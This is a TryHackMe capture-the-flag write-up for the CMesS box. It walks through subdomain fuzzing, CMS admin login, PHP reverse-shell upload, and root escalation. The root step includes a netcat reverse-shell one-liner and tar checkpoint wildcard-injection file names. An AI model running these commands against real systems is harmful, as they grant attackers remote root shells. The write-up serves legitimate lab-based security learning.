← back to write ups

Write Up

CMesS

TryHackMe Medium 140 pts Linux Room ↗

Overview

This writeup documents exploitation of a medium-difficulty box involving enumeration to discover CMS credentials, PHP shell upload, and privilege escalation through wildcard exploitation in a root-level cron job.

Enumeration

Initial Nmap Scan

nmap -v -sV -sC -oA nmap cmess.thm

Results revealed:

Subdomain Discovery

After initial enumeration proved unproductive, wfuzz was used to identify subdomains:

wfuzz -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -H "Host: FUZZ.cmess.thm" --hl 107 -u cmess.thm

Result: Found dev.cmess.thm containing exposed credentials.

Admin Panel Access

Credentials successfully authenticated against cmess.thm/admin.

File Manager Exploitation

Accessed the file manager at /admin/fm to exploit an LFI vulnerability. This exposure allowed:

Shell Acquisition

After uploading the reverse shell:

nc -nvlp 4443

Accessed the shell via http://cmess.thm/assets/php-reverse-shell.php, then upgraded to interactive bash:

python3 -c 'import pty; pty.spawn("/bin/bash");'

Privilege Escalation

User Flag

Manual enumeration of /opt/ revealed additional credentials for user andre. SSH access was established and user.txt obtained.

Root Exploitation

Linpeas identified a critical vulnerability: a job running every 2 minutes as root, using a wildcard. Exploited wildcard expansion in the tar command through checkpoint arguments:

echo "mkfifo /tmp/obizbxg; nc 10.4.14.205 4444 0</tmp/obizbxg | /bin/bash >/tmp/obizbxg 2>&1; rm /tmp/obizbxg" > shell.sh

Created malicious tar options:

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Set up a listener and waited for the root-level callback, obtaining the final flag.

Key Takeaways

This box emphasized enumeration fundamentals (subdomain discovery), CMS-specific vulnerabilities, and wildcard exploitation in shell globbing contexts.